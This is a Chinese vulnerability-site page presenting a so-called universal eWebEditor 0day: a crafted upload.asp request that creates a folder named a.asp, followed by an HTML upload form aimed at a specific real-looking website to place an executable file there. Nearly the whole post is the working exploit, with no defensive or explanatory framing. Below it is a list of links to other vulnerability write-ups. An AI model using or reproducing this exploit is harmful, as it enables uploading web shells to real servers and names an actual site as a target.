手机
当前位置:查字典教程网 >网络安全 >漏洞分析 >ewebeditor通杀鸡肋0day漏洞
ewebeditor通杀鸡肋0day漏洞
摘要:先访问这个地址Editor/asp/upload.asp?action=save&type=image&style=popup&cusdir...

先访问这个地址

Editor/asp/upload.asp?action=save&type=image&style=popup&cusdir=a.asp

访问这个地址可以建立个A.ASP的文件夹……

再用这个html代码上传。

<form action="http://www.zzfhw.com/Editor/asp/upload.asp?action=save&type=image&style=popup&cusdir=a.asp" method=post name=myform enctype="multipart/form-data">

<input type=file name=uploadfile size=100><br><br>

<input type=submit value=upload>

</form>

【ewebeditor通杀鸡肋0day漏洞】相关文章:

科汛 KesionCMS 文件名解析漏洞

Linux Kiss Server多个格式串处理漏洞

DedeCms V5 orderby参数注射漏洞

php escapeshellcmd多字节编码漏洞解析及延伸

野草weedcmsV5.2.1 任意删除文件漏洞

DedeCms V5.1 tag.php注入漏洞

boblog任意变量覆盖漏洞

浅析 LxBlog V6 变量未初始化漏洞

eWebEditor 6.2 目录遍历漏洞(asp/browse.asp)

Cisco Unified Communications 远程命令执行漏洞

精品推荐
分类导航